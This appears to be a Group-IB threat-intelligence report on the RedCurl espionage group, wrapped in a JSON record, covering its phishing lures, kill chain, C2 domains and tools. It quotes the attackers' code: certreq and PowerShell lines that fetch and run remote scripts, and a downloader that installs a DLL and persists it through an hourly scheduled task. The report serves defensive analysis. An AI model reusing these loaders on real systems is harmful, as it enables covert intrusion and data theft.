{ "id": "9e2acfe9-0d80-40fe-9ebf-fc3498c56b35", "created_at": "2026-05-07T02:43:22.38865Z", "updated_at": "2026-05-07T02:44:11.125875Z", "deleted_at": null, "sha1_hash": "761ecbca0bbb436bdd87f9046aa80dc189c59fda", "title": "", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 7935434, "plain_text": "REDCURL\r\nThe awakening\r\ngroup-ib.com\r\nNot for distribution or duplication\r\nNOVEMBER 2021\n\n2\r\nREDCURL: THE AWAKENING © GROUP−IB\r\n1. This report was written by Group-IB experts without any\r\nthird- party funding.\r\n2. The report provides information on the tactics, tools, and\r\ninfrastructure of the cybercriminal group RedCurl. The report’s goal\r\nis to minimize the risk of the group committing further illegal acts,\r\nsuppress any such activity in a timely manner, and raise awareness\r\namong readers. The report also contains indicators of compromise\r\nthat organizations and specialists can use to check their networks for\r\ncompromise, as well as recommendations on how to protect against\r\nfuture attacks. Technical details about threats are provided solely\r\nfor information security specialists so that they can\r\nfamiliarize themselves with them, prevent similar incidents\r\nfrom occurring in the future, and minimize potential damage.\r\nThe technical details about threats outlined in the report\r\nare not intended to advocate fraud or other illegal activities\r\nin the field of high technologies or any other fields.\r\n3. The report is for information purposes only and is limited\r\nin distribution. Readers or not authorized to use\r\nit for commercial purposes and any other purposes not related\r\nto education or personal non-commercial use.\r\nGroup-IB grants readers the right to use the report worldwide\r\nby downloading, reviewing, and quoting it to the extent justified\r\nby legitimate citation, provided that the report itself (including a link\r\nto the copyright holder’s website on which it is published) is given\r\nas the source of the quote.\r\n4. The entire report is subject to copyright and protected\r\nby applicable intellectual property law. It is prohibited to copy,\r\ndistribute (including by placing on websites), or use the information\r\nor other content without the right owner’s prior written consent.\r\nIf Group-IB’s copyright is violated, Group-IB will have the right\r\nto approach a court or other state institution to protect its rights\r\nand interests and seek punishment for the perpetrator as provided\r\nby law, including recovery of damages.\r\n© Group−IB, 2021\r\nRestrictions\n\n3\r\n© GROUP−IB\r\nCon t e n t s\r\nREDCURL: THE AWAKENING\r\nRedCurl: The awakening 4\r\nBefore RedCurl’s hibernation 6\r\nKey findings 8\r\nKill chain 9\r\nInitial access 10\r\nReconnaissance and lateral movement 15\r\nData exfiltration 16\r\nTools 17\r\nBackend 17\r\nRedCurl.InitialDropper 19\r\nRedCurl.Downloader 21\r\nRedCurl.Extractor 23\r\nRedCurl.FSABIN 24\r\nRedCurl.CHABIN1 and RedCurl.CHABIN2 27\r\nLNK file infector 28\r\nCommands 29\r\nConclusion 33\r\nMITRE ATT\u0026CK ® (RedCurl) 34\r\nIndicators of compromise 36\r\nRecommendations 39\r\nContents\n\n4\r\n© GROUP−IB\r\nR e d C u r l: T h e awa ken i n g\r\nREDCURL: THE AWAKENING\r\nRedCurl: The awakening\r\nOn a Saturday morning in April 2021, Group-IB Threat Intelligence\r\nspecialists woke up to a headache. Nothing unusual after a Friday\r\nevening, you might say. Yet this time, the headache was caused\r\nnot by the finest Czech samples analyzed the previous evening,\r\nbut by a bright red flashing image of the Gorgon Medusa. Group-IB’s system had detected a new attack by RedCurl, a Russian-speaking hacker group that we had uncovered and described a year\r\nearlier, and which later disappeared from our radar.\r\nIn the meantime, the members of RedCurl — as the group was\r\nnamed by Group-IB specialists — had not wasted any time. They\r\nmodified their tools but retained the same end goal: corporate cyber\r\nespionage. This time, the victim was one of the largest wholesale\r\nstores in Russia, which had already been attacked once before and\r\nwas in the process of being attacked when we started our research.\r\nAfter discovering traces of the first attack, Group-IB specialists\r\nimmediately contacted the victim, shared all the relevant\r\ninformation, and recommended what steps to take to contain the\r\nincident and prevent it from spreading. So began the research into\r\na new development in attacks by the hacker group RedCurl, whose\r\nactivities we first detailed a year ago in the report “RedCurl. The\r\npentest you didn’t know about.”\r\nOver the course of seven months, the group significantly improved\r\ntheir arsenal to achieve their main goal, which is conducting thoroughly\r\nprepared cyber espionage attacks that can only be detected\r\nby a highly qualified cybersecurity team. As in the past, in each\r\nof the campaigns analyzed the group’s aim was to infect computers\r\nin a targeted department within an organization’s infrastructure\r\nand to steal sensitive data.\r\nThe attackers were highly skilled in red teaming and knew how\r\nto develop malware that bypasses traditional antivirus software.\r\nThey also meticulously examined the victim before the attack,\r\nas could be seen from the spear phishing emails they sent to various\r\ndepartments within the targeted organization.\r\nEspionage in cyberspace is a hallmark of state-sponsored advanced\r\npersistent threats (APTs). In most cases, such attacks target other\r\nstates or state-owned enterprises. Corporate cyber espionage\r\nis still a relatively rare and, in many ways, unique occurrence.\r\nHowever, it is possible that the group’s success could lead to a new\r\ntrend in cybercrime.\r\nRedCurl is known for its patience: anywhere from two to six months\r\ncan pass from the time that “patient zero” is infected to the time\r\nthat data is stolen. The group’s main objective is to move covertly\r\nand remain undetected. RedCurl does not use any “active” Trojans\r\nor common ways of controlling compromised devices remotely.\r\nInstead, the hackers use self-developed tools that are constantly\r\nevolving and that make it possible to persist and move slowly within\r\nRedCurl\r\nA corporate cyber espionage hacker\r\ngroup\r\nThe group’s goal\r\nIs to steal documents containing\r\ncommercially sensitive information and\r\nemployees’ personal data\r\nTools\r\nThe group acted as covertly as possible\r\nto minimize the risk of being discovered\r\non the victim’s network: RedCurl did\r\nnot use actively communicating Trojans\r\nor remote administration tools\n\n5\r\n© GROUP−IB\r\nR e d C u r l: T h e awa ken i n g\r\nREDCURL: THE AWAKENING\r\nan infected infrastructure. Moreover, although they do not shy\r\naway from using publicly available scripts (such as LaZagne) and\r\ntechniques (changing WDigest parameters and dumping lsass.exe,\r\na process that already contains passwords as plain text), their\r\nactions and methods remain unique.\r\nDespite a high level of control of the victim’s network, the group\r\ndoes not encrypt infrastructure, withdraw money from accounts,\r\nor demand ransoms for stolen data. In other words, RedCurl\r\ndoes not actively seek to achieve the types of financial goals\r\nthat cybercriminals typically have. The group strives to ensure\r\nthat victims do not notice any infection. Even after the attack has\r\nended, victims could remain unaware that all their confidential\r\ninformation has been exfiltrated to RedCurl’s servers.\n\n6\r\n© GROUP−IB\r\nB e f o r e Re d C u r l’s hib e r n ati o n\r\nREDCURL: THE AWAKENING\r\nBefore RedCurl’s\r\nhibernation\r\nOur previous report on RedCurl mentions that we first discovered\r\nthe group’s activity in 2019. An in-depth investigation into the\r\ngroup’s operations helped us uncover attacks conducted\r\nin 2018. Victims included companies in the fields of finance, tourism,\r\ninsurance, construction, consulting, and retail located worldwide,\r\nfrom Russia to North America.\r\nAfter obtaining up-to-date information about the victim\r\norganization’s current employees, the hackers sent spear-phishing\r\nemails with decoy documents. This year, we uncovered four more\r\nattacks, although we were unfortunately unable to identify any\r\nvictims for two of them. The updated attack timeline is shown below.\r\nattacks\r\nidentified\r\nvictims\r\nattacks since\r\nthe beginning\r\nof 2021\r\nDwell time\r\nin the victim%s\r\ninf!ast!ct!e1\r\n2-6 months\r\nGiven that the group’s main goal is cyber espionage (stealing\r\noffice documents as well as text and image files), RedCurl can stay\r\nin the victim’s infrastructure unnoticed for a long time. Based on our\r\nexperience in responding to incidents associated with the group,\r\nthe time between the initial infection and the theft of documents\r\nis from two to six months. The group is interested in the following\r\ntypes of files:\r\n• Staff records\r\n• Documents about various legal entities\r\n• Court records\r\n• Internal documents\r\n• Email history\r\nIf necessary, publicly available tools (e.g., NirCmd, 7-Zip, curl,\r\nADExplorer, and LaZagne with the Python Interpreter) can\r\nbe delivered to the infected system.\r\nOne of the group’s distinctive features is that during attacks it uses\r\nas few custom executable files as possible and as many batch and\r\nPowerShell scripts as possible. Examples of such scripts include\r\nmodules that act as downloaders. Functionality is expanded\r\nby uploading and executing commands that are also batch scripts.\r\nIf the command interpreter’s functionality is insufficient for the\r\nattackers, they insert a PowerShell script into the batch scripts.\r\nDE\r\nDE\r\nDE\r\nUA\r\n06/11\r\n0/0\r\n0/1\r\n12/01\r\nRU\r\nDE\r\nRU\r\nRU\r\nRU\r\nRU\r\nUA\r\nCA\r\nNO\r\nRU\r\nRU\r\nRU\r\nRU\r\nRU\r\nRU\r\nRU\r\nU\r\n0/02\r\n0/10\r\n0/11\r\n0/1\r\n0/2\r\n0/!0\r\n0/!1\r\n0/06\r\n0/0\r\n0/1\r\n0(/12\r\n0(/2!\r\n0(/2\r\n10/1\r\n10/1\r\n11/2\r\n12/20\r\nU\r\nRU\r\nRU\r\nRU\r\nRU\r\n01/21\r\n02/20\r\n0!/20\r\n06/0\r\n0/1\r\n2019\r\n2020\r\nN1A\r\nRU\r\nRU\r\nN1A\r\n0!/26\r\n0/2\r\n0/2\r\n06/2(\r\n2021\r\n2014\n\n7\r\n© GROUP−IB\r\nB e f o r e Re d C u r l’s hib e r n ati o n\r\nREDCURL: THE AWAKENING\r\nWith every new attack, the hackers introduced small\r\nimprovements. This is despite the fact that the tools used were\r\ninitially flexible (due to the module system) and could not be detected\r\nby almost any security solution (because using legitimate disk\r\nstorage systems, as many legitimate tools, and as few proprietary\r\ntools as possible creates “noise” that makes antivirus software and\r\nother solutions less effective). After our first report was published\r\nlast year, RedCurl disappeared from our radars and could no longer\r\nbe detected by Threat Intelligence \u0026 Attribution. It seemed at the\r\ntime that the group had decided to take a timeout and update its\r\ntoolset.\r\nHowever, when the time came for companies to publish their\r\nfinancial reports (arguably the most appealing time for a group\r\ninvolved in espionage), RedCurl conducted an attack the best\r\nway it knows how: by sending two carefully crafted mailouts, one\r\npurporting to come from the victim organization’s HR department\r\nand the other from a government services portal. The emails had\r\nobviously nothing to do with said HR department or government\r\nservices portal.\r\nIn this report, we describe RedCurl’s latest attack, from the kill chain\r\nto a detailed breakdown of every tool the hackers used. In addition\r\nto the report suggesting various ways to detect RedCurl within\r\nan organization’s infrastructure, it also offers recommendations\r\nfrom Group-IB specialists on how to counter cyberattacks\r\nby RedCurl and prevent financial damage due to cyber espionage\r\nbenefiting third parties.\n\n8\r\n© GROUP−IB\r\nK e y fi n di n g s\r\nREDCURL: THE AWAKENING\r\nKey findings\r\nGoal Corporate cyber espionage and documentation theft.\r\nActive The group has been active since 2018. Over more than three years,\r\nGroup-IB have identified 30 attacks.\r\nScripts RedCurl has shifted its focus from batch and PowerShell scripts\r\nto executable files.\r\nTools The tools contain logic errors — it is likely that the group did not\r\nhave enough time to test its new tools and that the attack was\r\nprepared in a hurry.\r\nThe group has made significant improvements to most of its tools.\r\nEffective methods of data encryption within malware files make\r\nthem much more difficult to analyze. Some tools were left almost\r\nunchanged, possibly due to a tight schedule to develop new tools.\r\nThe group will most likely continue to modify them.\r\nThe set of tools used for the attack was likely compiled a few hours\r\nbefore the attack or even as it was taking place.\r\nDomains RedCurl registers domain names on free web hosting services;\r\nthe group has almost stopped using the WebDav protocol.\r\nIn past attacks, the network drives the group controlled used only\r\ncommand modules.\n\n9\n© GROUP−IB\nKi ll chai n\nREDCURL: THE AWAKENING\nKill chain\nFigure 1. Common scheme of kill chain\nRedCuri.Downioader RedCuri.Extractor\nDrope fiee Downioadj\nand iaunchee\nDownioade\nand iaunchee\nRedCuri.ƒS„†‚\nDownioade fie\nDownioade\nand iaunchej\nPowerSheii\necript\nCreatee taek\nPaeeee\ndecryption key\nExecutee taek\nPaeeej\ndecryption key\nExecutee taek\nMaiicioue\nattach-ent\nLNK\n\u003e_ DLL DLL DLL\nCOMMANDS\n\u003c/\u003e\nPhiehinA e-aii\nHTTP HTTP\nHTTP HTTP\nCreatee taek\nRedCuri.‚nitiaiDropper\nOn this occasion, RedCurl attacked one of Russia’s largest\nwholesale companies, which sells a wide range of home, office, and\nleisure goods. Most of the company’s customers are small and\nlarge wholesalers and chain stores, and the company itself is also\ninvolved in retail. The fact that a larger partner network was involved\ncould have suggested a supply chain attack (conducted through\nan intermediate victim). However, this was not the case as the\nhackers attacked the wholesale company itself — twice, as we were\nable to determine. It is pointless to speculate why one attack did\nnot suffice. However, usually this means that the infection vector\nwas not closed off in time and that the hackers were able to use\nit twice. It likely also means that the hackers did not manage to find\nwhat they were looking for during their first attempt. In any case,\nthese are just hypotheses.\nThe first thing that caught our attention as we were investigating\nRedCurl’s latest attack was that the kill chain for “patient zero” had\ngrown larger. In the group’s previous attacks, the time between\nreceiving the phishing email and launching the module responsible\nfor executing the code included three to four stages. In the latest\nattack, the infection chain had as many as five stages. First, the\ngroup added a new reconnaissance tool whose code shares many\nsimilarities with the binary version of FirstStageAgent module\n(we named the tool FSABIN), as well as a PowerShell downloader\nfor the tool. The overall infection pattern can be illustrated as follows:\nAs seen in the above diagram, RedCurl now actively uses web hosting\nservices, from which modules are spread in the system’s infection\nchain. During the research, we discovered that the following third-level domains registered on free services were used as C2 servers:\n\n10\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE AWAKENING\r\nInitial access\r\nAs mentioned in the introduction, RedCurl conducted two attacks\r\non a large wholesale store. As is typical for the group, the initial\r\nattack vector was spear-phishing emails. Targeted email campaigns\r\nmade to look like they were sent by the victim’s HR department\r\nhave become the group’s trademark. In the first of the latest\r\nattacks we analyzed, the hackers did not stray away from tradition,\r\nwhich can clearly be seen from the example email. As usual, social\r\nengineering was involved. The decoy document mentions changes\r\nto staff incentive programs, essentially luring employees into\r\nclicking on the link provided with the promise of bonuses:\r\n*.atspace[.]tv\r\n*.filecloudio[.]club\r\n*.myartsonline[.]com\r\n*.medianewsonline[.]com\r\n*.atspace[.]eu\r\n*.c1[.]biz\r\nWe will look at each tool in detail later in this report. First, let’s focus\r\non the kill chain.\r\nFig. 2. Examples of RedCurl emails purporting to be from the HR department\n\n11\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE AWAKENING\r\nDuring the second attack, the emails were sent in a no less\r\nsophisticated way. This time, they were disguised as originating from\r\na government services portal:\r\nOf course, the email had nothing to do with the government services\r\nportal. The cybercriminals simply took advantage of a name that\r\neveryone knows. All emails were sent from addresses registered\r\nwith Outlook. Based on data contained in the email headers and\r\nthe information we obtained from our in-house technology called\r\nGroup-IB Network Graph, the hackers used proxy servers to send\r\nthe emails to the victims. For example, one of the emails was sent\r\nfrom the IP address 37.120.221[.]28:\r\nFig. 3. Example of a RedCurl email allegedly sent from the government portal\r\nFig. 4. Screenshot from Group-IB Network Graph with information about the\r\nIP address (cut version)\n\n12\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE AWAKENING\r\nEvery email contained a link to a 7-Zip archive with an LNK file (the\r\nfile in question was classified as RedCurl.InitialDropper) designed\r\nto download and launch the next stage, which was a feature\r\nin the group’s previous attacks. Links in the archive redirected\r\nto a fourth-level domain: *.md.cloudexpdef[.]email. The domain\r\ncloudexpdef[.]email itself was registered not long before the first\r\nmailout and, presumably, was used to attack several organizations.\r\nBased on when the files were compiled, it seems that the hackers\r\ncollected malicious executable files shortly before the attack.\r\nIn one attack, the compilation time for RedCurl.Downloader was\r\nMay 25, 2021, at 06:25, while the malicious email was sent an hour\r\nlater on May 25, 2021, at 7:22. The next stage of the kill chain,\r\nRedCurl.Extractor, which contains the module RedCurl.FSABIN,\r\nwas compiled on May 25, 2021, at 11:50 (as was the module itself).\r\nThe timing could indicate that the hackers validated the infection\r\nmanually and compiled the tools on the fly.\r\nCompiling\r\nRedCurl.Downloader\r\n25.05.2021 06:25\r\nSending an email\r\n25.05.2021 0:22\r\nCompromi4ing3\r\nthe targeted organization\r\nCompiling\r\nRedCurl.CBtraStor3\r\nand RedCurl.FSABIN\r\n25.05.2021 11:50\r\nWhen users opened the LNK file, network drives were not mounted.\r\nInstead, the next stage — batch or PowerShell scripts — took\r\nplace on the server controlled by the hackers. The scripts were\r\ndownloaded using various methods, each of which is described\r\nin detail in the Tools section.\r\nThe second stage was necessary for downloading and launching\r\na new tool in the group’s framework, RedCurl.Downloader. The\r\nsecond stage was also responsible for ensuring persistence of the\r\ndownloader (i.e., the DLL file) through a task in the Scheduler that\r\nrecurred once an hour.\r\nFig. 5. Stages of how RedCurl gained initial access to the victim organiza-tion’s network\n\n13\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE AWAKENING\r\nIn our first report, we noted that RedCurl.Dropper contained\r\nimportant data such as strings encrypted with a password that\r\nwas passed as an argument. In one of the recent attacks, the\r\ngroup went even further: a part of the password was located in the\r\nmalware body, while another part was in the form of an argument. This\r\nmeans that obtaining the file alone was not enough to extract any\r\nuseful data from it because decrypting the strings required launch\r\narguments. RedCurl.Downloader was launched using the standard\r\nutility rundll32.exe, for which a pathway to the malicious library and\r\nthe second part of the password were passed as arguments.\r\nIn addition to RedCurl.Downloader being downloaded and\r\nlaunched, the second stage involves downloading and displaying\r\nthe decoy document, which is designed to lull the victim into a false\r\nsense of security. As in previous attacks, the group took great care\r\nin preparing the decoy documents. Their content was always directly\r\nrelated to the targeted organization. In most cases, the content\r\nof the decoy document was borrowed from open sources, including\r\nthe organization’s website, which usually includes information about\r\nthe team, management, and more.\r\nRedCurl.Downloader has two tasks: to collect and send information\r\nabout the infected device to the C2 server, and to download and\r\nlaunch the next stage. The latter is a modified version of the tool\r\ncalled RedCurl.Dropper that we described last year and classified\r\nas RedCurl.Extractor. It is indeed the same dropper, which\r\ndoes not perform any network communications and is designed\r\nto extract the 7z utility and the final stage, RedCurl.FSABIN, as well\r\nas achieve persistence of the latter on the infected device. Both\r\nfiles are located in the dropper body in encrypted form, as is the\r\nkey to decrypt them. The final stage, RedCurl.FSABIN, is launched\r\nby a task created by the dropper and repeated once an hour.\r\nAs in the case of RedCurl.Downloader, the strings in the body\r\nof RedCurl.FSABIN were encrypted with a password. The\r\napplication received part of that password in the form of a launch\r\nargument. As is clear from the name of the last stage, RedCurl.\r\nFSABIN, it is RedCurl.FirstStageAgent, which was described in the\r\nfirst report and is created in the form of an executable file. In the\r\nsame way as its PowerShell predecessor, the application collected\r\nand sent information about the infected device to the C2 server,\r\nas well as downloaded and executed command submodules, namely\r\nthe batch scripts. Commands, as well as the previous stages, were\r\nlocated on the HTTP servers controlled by the hackers. The outcome\r\nof executing the command was saved to a legitimate cloud drive\r\nthat was mounted during the attack. The command modules were\r\nleft largely unchanged.\r\nIt is important to note that in the new RedCurl.FSABIN, we did not\r\nfind any code fragments responsible for launching the equivalents\r\nof RedCurl.Channel1 and RedCurl.Channel2. However, during the\r\nincident response engagement, we discovered several additional\r\nexecutable files that had not been classified before, but whose\r\nfunctionalities bore strong similarities to Channel1 and Channel2.\r\nWe called them RedCurl.CHABIN1 and RedCurl.CHABIN2. We were\r\nunable to determine how exactly the modules were delivered to the\n\n14\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE AWAKENING\r\ninfected devices, but one of the possible vectors was a command\r\nthat RedCurl.FSABIN received from the hackers. The modules\r\nChannel1 and Channel2, as well as their binary equivalents, do not\r\ndiffer at all from FSA in terms of functionality and are designed\r\npurely as backup channels to control the infected device. If for any\r\nreason RedCurl.FSABIN stops responding (e.g., if the C2 server\r\naddresses are added to a blacklist in the victim’s network security\r\nsolutions), at least one of the channels becomes activated and the\r\nhackers can use it to control the infected device.\n\n15\r\n© GROUP−IB\r\nR econnaissance and lateral movement\r\nREDCURL: THE AWAKENING\r\nReconnaissance and\r\nlateral movement\r\nAfter infecting a computer in the victim’s network, RedCurl collects\r\ninformation about its infrastructure. The group is mainly interested\r\nin:\r\n• The name and version of the infected system\r\n• The list of network and logical drives\r\n• The list of passwords\r\n• Any other information that can be obtained using the standard\r\nutility systeminfo\r\nThe group’s lateral movement techniques have not changed:\r\nRedCurl compiles a list of directories on the network drive that are\r\navailable for writing. Next, the hackers create an LNK file designed\r\nto launch a modified version of RedCurl.Extractor. A legitimate\r\ndocument from the drive is used as a decoy. It is hidden from\r\nthe user, and the LNK file borrows its name. The pathway to the\r\noriginal document is sent as a RedCurl.Extractor parameter. This\r\nmeans that when a user within the organization opens the LNK file\r\nin question from the network drive, they launch RedCurl.Extractor\r\nas a result, which then launches the previously hidden document.\r\nDespite the relatively effective but slow way of moving within the\r\norganization’s infrastructure (the time between the initial infection\r\nand documents being stolen can take up to six months), the\r\nhackers did not go unnoticed. It was creating suspicious LNK files\r\non network drives that caught the attention of employees at the\r\nvictim’s security department. It was not possible to determine,\r\nhowever, which exact commands were executed on the infected\r\ndevices before the hackers moved across the network. Antivirus\r\nsoftware failed to detect the initial infection or stop the hackers\r\nfrom moving further within the victim’s network. Accordingly,\r\ncountering attacks by APT groups as advanced as RedCurl requires\r\ncomprehensive security measures.\n\n16\r\n© GROUP−IB\r\nD ata ex fi ltrati o n\r\nREDCURL: THE AWAKENING\r\nData exfiltration\r\nAs was the case in attacks that took place before 2021, which\r\nwe described in detail in our first report on the group, RedCurl\r\nstole data using command modules that, unlike other tools, have\r\nnot changed much. The attackers continued to save the outcomes\r\nof command executions to password-protected archives and wrote\r\nthem to legitimate cloud storage systems, with a different password\r\nfor each command. They also continued to use LaZagne (https://\r\ngithub.com/AlessandroZ/LaZagne) and ADExplorer (https://docs.\r\nmicrosoft.com/en-us/sysinternals/downloads/adexplorer).\r\nOne aspect worth pointing out is that a few commands\r\nwere combined into one. For example, one of the commands\r\nwe discovered collected information about the infected device\r\nusing built-in Windows tools and launched the LaZagne utility. In the\r\npast, separate commands performed the two tasks.\r\nDespite the more than seven-month lull between attacks, RedCurl\r\ndeveloped its tools in a hurry. While investigating one of the\r\ncommands, we uncovered a curious logical error: the environment\r\nvariable was indicated incorrectly in the module, which is why the\r\npassword for the archive was short and incorrect. It is likely that the\r\ngroup faced tight time constraints in conducting the attacks and\r\nthat they did not manage to test their tools sufficiently.\n\n17\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nTools\r\nIn this part of the report, which details RedCurl’s new stage\r\nof activity, we carefully research each of the group’s updated tools.\r\nThe main change was “binarization”. RedCurl replaced PowerShell\r\nscripts with their equivalents, namely executable files, but without\r\nchanging the functionality of the tools. The only modules that were\r\nnot rewritten were commands (they were modified only slightly).\r\nThe tools are described in the order in which they were mentioned\r\nin the description of the kill chain.\r\nBackend All of the group’s tools except commands sent information about\r\nthe infected device and received a payload through HTTP servers\r\nwhich were controlled by the group and located on free web hosting\r\nservices. As a result of CERT-GIB working closely with the support\r\nteams of the web hosting services, we were able to analyze the\r\nserver side of RedCurl’s tools. The servers we examined turned out\r\nto be layers between the operators and the infected device, and\r\nthey were designed to perform two tasks:\r\n1. Collect logs from infected devices\r\n2. Download the next stage on the infected device\r\nHTTP\r\nVictim RedCurl web server\r RedCurl\r\nTo perform the first task, on the server side the cybercriminals\r\ndeployed Tiny File Manager V2.4.3, which is a project with open-source code available on GitHub: https://github.com/prasathmani/\r\ntinyfilemanager. The server side has no tools for automatically\r\nsending the collected logs to a different server, which means that\r\nthe hackers retrieved the logs manually or using scripts from a dif-ferent intermediate server.\r\nFig. 6. Scheme of RedCurl controlling the infected devices\n\n18\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nThe backend script was written in PHP. The servers merely\r\nprocessed the information obtained from the victim’s infected\r\ndevices and sent the next stage in response. All the information\r\nabout infected devices was saved to the logs directory in separate\r\nfiles, whose names corresponded to the names of the infected\r\ndevices. More detailed information about how data was collected\r\ncan be found in the sections that describe the group’s tools.\r\nIn addition to information from the infected device, the IP address\r\nand the time that the request was received were saved in the file.\r\nBefore the latter took place, the time was adjusted according to the\r\ntime zone in Minsk, UTC+3 (strings 94-97). When obtaining the\r\nname of the computer and user, displaying them correctly in the file\r\nrequired using CP866 encoding (DOS Cyrillic Russian).\r\nFig. 7. Backend code area designed to control the Chanel module\r\nFig. 8. Backend code area designed to correct the time zone\n\n19\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nThe certreq utility is a standard utility that comes with the Windows\r\noperating system. Although it is aimed at downloading certificates\r\nfrom the certification center, the utility makes it possible to download\r\nany file, which the cybercriminals took advantage of.\r\nceRtReq -Q -Post -cOnFIg HTTP://%HTTP_URL% C:\\WINDowS\\Win.INi\r\n.\\$ENv:cOmpuTeRNAmE.tmp;\r\nMOVe .\\$EnV:cOMPUtErNaME.tmP .\\$EnV:COMpuTername.BAT -foRCE;\r\nStARt .\\${enV:COMpuTErnamE}.Bat -NONEwwinDow;\r\nIn the case of PowerShell scripts, two options are possible. The first\r\nis to use a class called System.Net.WebRequest, which is used\r\nto make a GET request with the User-Agent field filled in advance.\r\n$reQF = [sYsTem.nET.WEbreQUEst]::crEATE(‘hXXp://%HTTP_URL%’);\r\n$ReqF.MEtHoD=’gEt’;\r\n$rEqf.useragenT = ‘Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU)\r\nWindowsPowerShell/5.1.20134.790’;\r\n$ReSf = $ReqF.gEtreSPONsE();\r\n$stRF = $RESf.GetrEsponSeSTReam();\r\n$reaf = New-ObJEcT sysTem.io.STreAMrEADer $strF;\r\nPoWerSHell $rEaF.rEadToenD();\r\nIt is noteworthy that the C2 server did not return the payload\r\nif the User-Agent did not contain a PowerShell substring. In the\r\nsecond PowerShell option, the settings of the proxy server were\r\ndetermined before the payload was received. If the infected\r\nsystem used proxy servers to access the Internet, they were used\r\nto obtain the next stage. In such cases, the next-stage malware\r\nwas downloaded using the Invoke-WebRequest function.\r\nThe downloaded script (the next stage) will be launched using\r\nPowerShell without being saved to the infected system.\r\n$A=[SYStem.neT.WEBrEQueSt]::GEtSYstEMWebpRoXY().GeTpRoXY(‘http://\r\nmsn.com’);\r\nIF($a.HOST -eQ ‘msn.Com’){\r\n (IwR -usEBASIcpARsInG -urI http://%URL%).tOstRInG()|POWErSHELl.\r\nEXe\r\n}ELSE{\r\n (IWR -usEBaSIcPArsInG -urI http://%URL% -PRoXy $A -pRoxYuseDe-fauLTcReDENTialS).tOsTRInG()|powErShELL.Exe\r\n};”\r\nRedCurl\r\nInitialDropper\r\nRedCurl.InitialDropper is the LNK file that was used during the\r\ninitial infection phase. After being launched, LNK downloaded batch\r\nor PowerShell scripts from the C2 server in one of two ways: using\r\nthe certreq utility or standard methods available in PowerShell.\r\ncerteq\r\nThe certreq command is used\r\nto communicate with the certification\r\ncenter, including in order to request\r\ncertificates. The full description\r\nof the tool is available on the official\r\nwebsite: certreq | Microsoft Docs.\n\n20\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nThe next stage involved a PowerShell script designed to download\r\nRedCurl.Downloader and ensure its persistence. Before\r\ndownloading the next stage, the PowerShell script created a directory\r\nwith a name generated according to the template %APPDATA%\\\r\n[A-Z]{4}%COMPUTERNAME%, while the downloaded file was saved\r\nto the directory in question with the name [a-z]{4,5}%USERNAME%.\r\ndll. The first symbols in the directory and file names were saved in the\r\nscript body and changed with each new attack.\r\nBy creating a task that repeats once an hour in the Scheduler, the\r\nPowerShell script ensured persistence of RedCurl.Downloader.\r\nRedCurl.Downloader was then launched using the standard utility\r\nrundll32.exe, where the pathway to the malicious library and the part\r\nof the password for decrypting data located inside the executable\r\nfile were passed as arguments. Below is an example of a launch\r\ncommand:\r\n \r\nrundll32.exe shell32.dll,Control_RunDLL %MODULE_PATH%\r\n%DECRYPTION_KEY%\r\nThe task name was generated as the PowerShell script was\r\nlaunched and contained the predefined strings, the user name, and\r\nthe computer name. The template for generating the task name can\r\nbe presented as follows:\r\n\\Temp\\[A-Z]{4}%COMPUTERNAME%\\[a-z]{4,5}%USERNAME%\r\nBelow is an example of a created task:\r\nFig. 9. Example of a task for launching RedCurl.Downloader\n\n21\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE AWAKENING\r\nApart from downloading and launching RedCurl.Downloader, the\r\nscript downloaded a decoy document that was saved to a file titled\r\n%APPDATA%\\%COMPUTERNAME%.pdf and showed it to the user.\r\nBelow is an example of a PowerShell downloader:\r\ncd $env:appdata;\r\n$fxt=’.pdf’;\r\n$rrdcvfdpg=’hXXps://%URL%’;\r\n$mnfld=’exp’;\r\n$dnpath=’dn’;\r\n$infro=’inf’;\r\n$fkupt=’%KEY%’;\r\n$hfcvswf=’MTLK’+$env:computername;\r\n$jcnfgdw=’paran’+$env:username+’.dll’;\r\nmkdir .\\$hfcvswf;\r\n$tn=’\\Temp\\UGTE’+$env:computername+’\\apra’+$env:username;\r\n$tr=’rundll32.exe shell32.dll,Control_RunDLL ‘+$env:appdata+’\\’+$hf\r\ncvswf+’\\’+$jcnfgdw+’ ‘+$fkupt;\r\nschtasks /create /SC hourly /MO 1 /tn $tn /TR $tr /F | Out-Null;\r\n$ocgfbca = New-Object -ComObject MSXML2.XMLHTTP;$ocgfbca.\r\nOpen(‘POST’, $rrdcvfdpg+’/’+$mnfld+’/’+$infro, $False);$ocgfbca.\r\nsetRequestHeader(‘User-Agent’,’Mozilla/5.0 (Windows NT; Windows\r\nNT 10.0; ru-RU) WindowsPowerShell/5.1.20134.790’);$ocgfbca.Send();\r\n[io.file]::WriteAllBytes($env:appdata+’\\’+$env:computername+$fxt,\r\n$ocgfbca.ResponseBody);\r\n$ocgfbca.Open(‘POST’, $rrdcvfdpg+’/’+$mnfld+’/’+$\r\ndnpath, $False);$ocgfbca.setRequestHeader(‘User-Agent’,’Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPow\r\nerShell/5.1.20134.790’);$ocgfbca.Send();\r\n[io.file]::WriteAllBytes($env:appdata+’\\’+$hfcvswf+’\\’+$jcnfgdw,\r\n$ocgfbca.ResponseBody);\r\n$rn=’.\\’+$env:computername+$fxt;\r\nrundll32 url.dll,FileProtocolHandler $rn | Out-Null\r\nRedCurl\r\nDownloader\r\nRedCurl.Downloader is an intermediate stage, intended to collect\r\ninformation about the infected device and download and launch\r\nthe next stage: RedCurl.Extractor. RedCurl.Downloader is a new\r\ntool that, unlike the group’s other tools, does not have a PowerShell\r\nequivalent. All important information, including the C2 server\r\naddresses used by the hackers, was encrypted in the body of the\r\nexecutable file using the algorithm AES-128 CBC. The first 16 